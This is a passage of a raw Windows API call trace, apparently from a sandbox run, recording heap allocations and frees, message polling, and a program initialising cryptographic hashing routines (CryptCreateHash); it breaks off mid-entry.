RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.158] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.158] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0201.158] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0201.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0201.158] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.159] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.159] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0201.159] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.159] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0201.159] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.159] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0201.159] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0201.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0201.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0201.160] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0201.160] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0201.160] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0201.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0201.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0201.161] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0201.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0201.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0201.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0201.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0201.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0201.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0201.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0201.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0201.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0201.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0201.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0201.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0201.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0201.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0201.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0201.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ea8 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0201.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0201.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.167] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0201.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54da8 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0201.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0201.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0201.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0201.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: 